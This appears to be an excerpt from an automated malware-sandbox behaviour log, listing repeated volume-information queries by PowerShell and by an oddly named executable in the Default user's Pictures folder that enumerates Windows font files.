Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\cmd.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\Default\Pictures\XXPWErhsUbDrk.exe	Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
